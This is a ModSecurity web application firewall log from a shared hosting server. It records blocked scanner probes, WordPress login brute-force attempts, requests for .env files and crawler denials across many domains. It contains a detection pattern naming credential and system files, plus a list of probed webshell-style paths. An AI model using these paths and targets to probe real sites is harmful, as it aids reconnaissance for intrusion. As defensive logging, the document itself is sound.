[Tue May 26 13:15:35.688373 2026] [security2:error] [pid 501489:tid 501743] [client 37.156.188.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPn2kFNZ9cRlz80IjAvQAAAPw"]
[Tue May 26 13:15:37.081985 2026] [security2:error] [pid 501489:tid 501647] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPoGkFNZ9cRlz80IjA4AAAAKA"]
[Tue May 26 13:15:37.873115 2026] [security2:error] [pid 501489:tid 501537] [remote 37.187.156.42:56588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVPoWkFNZ9cRlz80IjA-wAA8C8"]
[Tue May 26 13:15:38.583681 2026] [security2:error] [pid 501489:tid 501733] [client 95.108.213.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVPomkFNZ9cRlz80IjBDQAAAPM"]
[Tue May 26 13:15:40.095555 2026] [security2:error] [pid 501489:tid 501729] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPo2kFNZ9cRlz80IjBPAAAAPA"]
[Tue May 26 13:15:41.088234 2026] [security2:error] [pid 501489:tid 501641] [client 94.103.183.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPpWkFNZ9cRlz80IjBWwAAAJs"], referer: https://www.anujtradingco.com/
[Tue May 26 13:15:42.366528 2026] [security2:error] [pid 501489:tid 501716] [client 94.103.183.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPpmkFNZ9cRlz80IjBfgAAAOU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 13:15:42.646779 2026] [security2:error] [pid 501489:tid 501662] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPpmkFNZ9cRlz80IjBewAAAK8"]
[Tue May 26 13:15:44.414464 2026] [security2:error] [pid 501489:tid 501691] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPp2kFNZ9cRlz80IjBsQAAAMw"]
[Tue May 26 13:15:44.836910 2026] [security2:error] [pid 501489:tid 501733] [client 176.65.139.239:44348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.madhuraclinic.svijaykumar.in"] [uri "/.env"] [unique_id "ahVPqGkFNZ9cRlz80IjBwQAAAPM"]
[Tue May 26 13:15:45.304469 2026] [security2:error] [pid 501489:tid 501714] [client 176.65.139.232:48242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dgcwestindia.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVPqWkFNZ9cRlz80IjB0QAAAOM"]
[Tue May 26 13:15:45.317056 2026] [security2:error] [pid 501489:tid 501667] [client 176.65.139.235:22814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.mmajaypackersmovers.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVPqWkFNZ9cRlz80IjB0gAAALQ"]
[Tue May 26 13:15:46.203760 2026] [security2:error] [pid 501489:tid 501694] [client 176.65.139.234:63960] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.swamijifoundation.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVPqmkFNZ9cRlz80IjB4gAAAM8"]
[Tue May 26 13:15:46.970424 2026] [security2:error] [pid 501489:tid 501643] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPqmkFNZ9cRlz80IjB6wAAAJ0"]
[Tue May 26 13:15:47.025029 2026] [security2:error] [pid 501489:tid 501556] [remote 74.7.241.58:54194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVPq2kFNZ9cRlz80IjB9wAAt0I"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:15:47.460284 2026] [security2:error] [pid 501489:tid 501709] [client 176.65.139.237:44034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "besglam.com"] [uri "/.env"] [unique_id "ahVPq2kFNZ9cRlz80IjCAQAAAN4"]
[Tue May 26 13:15:49.940303 2026] [security2:error] [pid 501489:tid 501681] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPrWkFNZ9cRlz80IjCPQAAAMI"]
[Tue May 26 13:15:51.905212 2026] [security2:error] [pid 501489:tid 501677] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPr2kFNZ9cRlz80IjCbgAAAL4"]
[Tue May 26 13:15:53.974963 2026] [security2:error] [pid 501489:tid 501686] [client 4.201.75.230:2140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVPsWkFNZ9cRlz80IjCuAAAAMc"]
[Tue May 26 13:15:54.555044 2026] [security2:error] [pid 501489:tid 501660] [client 114.119.146.255:63919] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/Ferraamo/item/10559828"] [unique_id "ahVPsmkFNZ9cRlz80IjCzwAAAK0"], referer: http://newdental.com.co/Ferraamo/item/10559828?bid=l10abfabbc&pid=g53081b.undeserver
[Tue May 26 13:15:54.929304 2026] [security2:error] [pid 501489:tid 501725] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPsmkFNZ9cRlz80IjCzQAAAO0"]
[Tue May 26 13:15:55.790255 2026] [security2:error] [pid 501489:tid 501740] [client 4.201.75.230:34722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVPs2kFNZ9cRlz80IjC-AAAAPk"]
[Tue May 26 13:15:56.032173 2026] [security2:error] [pid 501489:tid 501716] [client 74.7.228.25:54546] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "adityacreations.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVPtGkFNZ9cRlz80IjC-QAA5Vs"]
[Tue May 26 13:15:57.396850 2026] [security2:error] [pid 501489:tid 501738] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPtGkFNZ9cRlz80IjDDAAAAPc"]
[Tue May 26 13:15:58.253474 2026] [security2:error] [pid 501489:tid 501492] [remote 216.73.217.110:35385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahVPtmkFNZ9cRlz80IjDKwAA4AI"]
[Tue May 26 13:15:58.381135 2026] [security2:error] [pid 501489:tid 501747] [client 4.201.75.230:34733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVPtmkFNZ9cRlz80IjDMAAAAQA"]
[Tue May 26 13:15:59.331909 2026] [security2:error] [pid 501489:tid 501715] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPtmkFNZ9cRlz80IjDQgAAAOQ"]
[Tue May 26 13:15:59.798600 2026] [security2:error] [pid 501489:tid 501681] [client 4.201.75.230:34690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahVPt2kFNZ9cRlz80IjDUgAAAMI"]
[Tue May 26 13:16:02.439838 2026] [security2:error] [pid 501489:tid 501710] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPuWkFNZ9cRlz80IjDjgAAAN8"]
[Tue May 26 13:16:03.707739 2026] [security2:error] [pid 501489:tid 501750] [client 45.131.49.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPu2kFNZ9cRlz80IjDsAAAAQM"]
[Tue May 26 13:16:04.729785 2026] [security2:error] [pid 501489:tid 501709] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPvGkFNZ9cRlz80IjDywAAAN4"]
[Tue May 26 13:16:05.220253 2026] [security2:error] [pid 501489:tid 501644] [client 4.201.75.230:34717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVPvWkFNZ9cRlz80IjD3gAAAJ4"]
[Tue May 26 13:16:07.202326 2026] [security2:error] [pid 501489:tid 501656] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPvmkFNZ9cRlz80IjEDAAAAKk"]
[Tue May 26 13:16:07.917988 2026] [security2:error] [pid 501489:tid 501590] [remote 95.216.117.13:34520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVPv2kFNZ9cRlz80IjEIgAAx2Q"]
[Tue May 26 13:16:09.173835 2026] [security2:error] [pid 501489:tid 501625] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPwGkFNZ9cRlz80IjEQAAAAIs"]
[Tue May 26 13:16:09.417397 2026] [security2:error] [pid 501489:tid 501750] [client 4.201.75.230:34734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVPwWkFNZ9cRlz80IjESwAAAQM"]
[Tue May 26 13:16:10.353896 2026] [security2:error] [pid 501489:tid 501658] [client 141.98.11.171:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ndequipments.com"] [uri "/.env"] [unique_id "ahVPwmkFNZ9cRlz80IjEWwAAAKs"]
[Tue May 26 13:16:10.378128 2026] [security2:error] [pid 501489:tid 501696] [client 4.201.75.230:34696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVPwmkFNZ9cRlz80IjEXAAAANE"]
[Tue May 26 13:16:10.886463 2026] [security2:error] [pid 501489:tid 501505] [remote 141.98.11.171:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ndequipments.com"] [uri "/.env"] [unique_id "ahVPwmkFNZ9cRlz80IjEZgAAlA8"]
[Tue May 26 13:16:10.990396 2026] [security2:error] [pid 501489:tid 501691] [client 85.208.96.194:45470] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVPwmkFNZ9cRlz80IjEbQAAAMw"]
[Tue May 26 13:16:10.990509 2026] [security2:error] [pid 501489:tid 501691] [client 85.208.96.194:45470] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVPwmkFNZ9cRlz80IjEbQAAAMw"]
[Tue May 26 13:16:12.244147 2026] [security2:error] [pid 501489:tid 501651] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPw2kFNZ9cRlz80IjEjgAAAKQ"]
[Tue May 26 13:16:13.852113 2026] [security2:error] [pid 501489:tid 501748] [client 4.201.75.230:34732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVPxWkFNZ9cRlz80IjE0gAAAQE"]
[Tue May 26 13:16:14.570287 2026] [security2:error] [pid 501489:tid 501649] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPxmkFNZ9cRlz80IjE3gAAAKI"]
[Tue May 26 13:16:16.681894 2026] [security2:error] [pid 501489:tid 501510] [remote 45.250.255.226:51210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVPyGkFNZ9cRlz80IjFIwAA7RQ"]
[Tue May 26 13:16:17.168219 2026] [security2:error] [pid 501489:tid 501643] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPyGkFNZ9cRlz80IjFKgAAAJ0"]
[Tue May 26 13:16:18.506385 2026] [security2:error] [pid 501489:tid 501712] [client 4.201.75.230:34718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVPymkFNZ9cRlz80IjFWwAAAOE"]
[Tue May 26 13:16:18.830180 2026] [security2:error] [pid 501489:tid 501713] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPymkFNZ9cRlz80IjFVwAAAOI"]
[Tue May 26 13:16:19.802230 2026] [security2:error] [pid 501489:tid 501718] [client 209.141.60.58:52611] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.60.141.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVPy2kFNZ9cRlz80IjFewAAAOc"]
[Tue May 26 13:16:21.806006 2026] [security2:error] [pid 501489:tid 501689] [client 4.201.75.230:34695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahVPzWkFNZ9cRlz80IjFvgAAAMo"]
[Tue May 26 13:16:21.953095 2026] [security2:error] [pid 501489:tid 501729] [client 213.201.140.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVPzWkFNZ9cRlz80IjFsQAAAPA"]
[Tue May 26 13:16:21.978019 2026] [security2:error] [pid 501489:tid 501677] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPzWkFNZ9cRlz80IjFugAAAL4"]
[Tue May 26 13:16:23.139240 2026] [security2:error] [pid 501489:tid 501650] [client 4.201.75.230:34708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/index/function.php"] [unique_id "ahVPz2kFNZ9cRlz80IjF4QAAAKM"]
[Tue May 26 13:16:24.348861 2026] [security2:error] [pid 501489:tid 501662] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPz2kFNZ9cRlz80IjGBQAAAK8"]
[Tue May 26 13:16:24.675908 2026] [security2:error] [pid 501489:tid 501738] [client 74.7.241.146:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kexcouriers.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVP0GkFNZ9cRlz80IjGIwAAAPc"]
[Tue May 26 13:16:24.677676 2026] [security2:error] [pid 501489:tid 501680] [client 74.7.241.146:38846] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kexcouriers.onesoft.in"] [uri "/robots.txt"] [unique_id "ahVP0GkFNZ9cRlz80IjGIQAAwVc"]
[Tue May 26 13:16:24.828527 2026] [security2:error] [pid 501489:tid 501652] [client 74.7.241.181:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kexcouriers.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVP0GkFNZ9cRlz80IjGNAAAAKU"]
[Tue May 26 13:16:24.829062 2026] [security2:error] [pid 501489:tid 501666] [client 74.7.241.181:37446] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahVP0GkFNZ9cRlz80IjGMgAAs0U"]
